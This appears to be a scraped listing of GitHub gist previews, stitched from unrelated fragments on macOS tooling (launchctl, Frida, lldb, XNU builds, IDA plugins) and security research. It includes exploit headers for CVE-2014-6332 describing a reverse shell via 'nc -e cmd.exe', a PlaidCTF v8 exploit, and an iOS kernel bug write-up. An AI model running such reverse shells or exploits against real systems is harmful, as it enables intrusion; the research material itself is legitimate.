I've never had great understanding of launchctl but the deprecation of the old commands with launchctl 2 (10.10) has been terrible as all resources only cover the old commands, and documentation for Apple utilities is generally disgracefully bad, with launchctl not dissembling.
Mad props to https://babodee.wordpress.com/2016/04/09/launchctl-2-0-syntax/ which contains most details
Internally, launchd has several domains, but launchctl 1 would only ask for service names,
$ clang -Wall -Os -pipe -g3 frida-gum-example.c -o frida-gum-example -L. -lfrida-gum -lresolv -Wl,-dead_strip -Wl,-no_compact_unwind
$ ./frida-gum-example
[*] open("/etc/hosts")
[*] close(3)
[*] open("/etc/fstab")
[*] close(-1)
[*] listener got 4 calls
[*] listener still has 4 calls
| # IDA (disassembler) and Hex-Rays (decompiler) plugin for Apple AMX | |
| # | |
| # WIP research. (This was edited to add more info after someone posted it to | |
| # Hacker News. Click "Revisions" to see full changes.) | |
| # | |
| # Copyright (c) 2020 dougallj | |
| # Based on Python port of VMX intrinsics plugin: | |
| # Copyright (c) 2019 w4kfu - Synacktiv |
| <html> | |
| <head> | |
| <!-- | |
| CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell | |
| The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port" | |
| 'server_ip' and 'server_port' in javascript below determined the connect back target | |
| Tested on | |
| - IE11 + Windows 7 64-bit (EPM is off) | |
| - IE11 + Windoes 8.1 64-bit (EPM is off) |
| // | |
| // Quick and dirty exploit for the "roll a d8" challenge of PlaidCTF 2018. | |
| // N-day exploit for https://chromium.googlesource.com/v8/v8/+/b5da57a06de8791693c248b7aafc734861a3785d | |
| // | |
| // Scroll down do "BEGIN EXPLOIT" to skip the utility functions. | |
| // | |
| // Copyright (c) 2018 Samuel Groß | |
| // | |
| // |
| #if 0 | |
| Reported : 19-Jan-2020 | |
| Fixed in iOS 13.4 with CVE-2020-9768 | |
| AppleJPEGDriverUserClient : mach port use-after-free/type-confusion via race condition | |
| AppleJPEGDriverUserClient external methods can be used synchronously or asynchronously, when used asynchronously, | |
| it brings the registered mach port (via registerNotificationPort()) and put it inside jpegRequest data structure, | |
| and no reference count was taken for this operation. since registerNotificationPort() is not gated, it is | |
| possible to release the port (if the port got substituted) during the processing of jpeg request and end up | |
| with dangling pointer passed to _mach_msg_send_from_kernel_proper(). |
A complete gdb to lldb command map.
(lldb) po responseObject
(lldb) po [responseObject objectForKey@"state"]
| #! /bin/bash | |
| # | |
| # build-xnu-4903.221.2.sh | |
| # Initial script by Brandon Azad (https://gist.github.com/bazad/654959120a423b226dc564073b435453) | |
| # Updated on 12/11/18 by matteyeux | |
| # | |
| # A script showing how to build XNU version 4570.1.46 on MacOS High Sierra | |
| # 10.13 with Xcode 9. | |
| # | |
| # Note: This process will OVERWRITE files in Xcode's MacOSX10.13.sdk. Make a |
| // Example usage: | |
| // Swizzler<NSString *, NSDateFormatter *, NSDate *> NSDateFormatter_stringFromDate_ { | |
| // NSDateFormatter.class, @selector(stringFromDate:), [&](auto self, auto date) { | |
| // if ([NSCalendar.currentCalendar components:NSCalendarUnitWeekday fromDate:date].weekday == 4) { | |
| // return @"It Is Wednesday My Dudes"; | |
| // } else { | |
| // return NSDateFormatter_stringFromDate_(self, date); | |
| // } | |
| // } | |
| // }; |